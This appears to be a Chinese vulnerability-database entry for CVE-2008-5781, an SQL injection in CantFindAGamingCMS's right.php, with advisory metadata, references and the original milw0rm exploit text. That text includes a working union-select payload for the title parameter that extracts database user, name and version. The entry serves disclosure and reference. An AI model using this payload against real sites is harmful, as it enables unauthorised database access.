CFAGCMS 'right.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117044 漏洞类型 SQL注入
发布时间 2008-12-15 更新时间 2009-01-06
CVE编号 CVE-2008-5781 CNNVD-ID CNNVD-200812-504
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7483
https://www.securityfocus.com/bid/32851
https://cxsecurity.com/issue/WLB-2009010112
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-504
|漏洞详情
CantFindAGamingCMS是一款针对游戏网站的内容管理系统。CantFindAGamingCMS(CFAGCMS)1.0Beta1中的right.php存在SQL注入漏洞。远程攻击者可以借助标题参数,执行任意的SQL指令。
|漏洞EXP
cfagcms Beta 1 sql inj.
 
download: http://mesh.dl.sourceforge.net/sourceforge/cfagcms/cfagcms.zip
 
Discovered By: ZoRLu
 
z0rlu.blogspot.com
 
trt-turk@hotmail.com    
 
date: 23.10.2008
 
N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
------------------------------------------------------------------
 
exploit:
 
http://localhost/cfagcms/right.php?title=[SQL]
 
[SQL]=
 
ZoRLu'+union+select+0,concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
 
------------------------------------------------------------------
 
thanks: str0ke
 
a.q kpss

# milw0rm.com [2008-12-15]
|受影响的产品
CFAGCMS CFAGCMS 1
|参考资料

来源:XF
名称:cfagcms-right-sql-injection(47358)
链接:http://xforce.iss.net/xforce/xfdb/47358
来源:BID
名称:32851
链接:http://www.securityfocus.com/bid/32851
来源:MILW0RM
名称:7483
链接:http://www.milw0rm.com/exploits/7483
来源:SREASON
名称:4850
链接:http://securityreason.com/securityalert/4850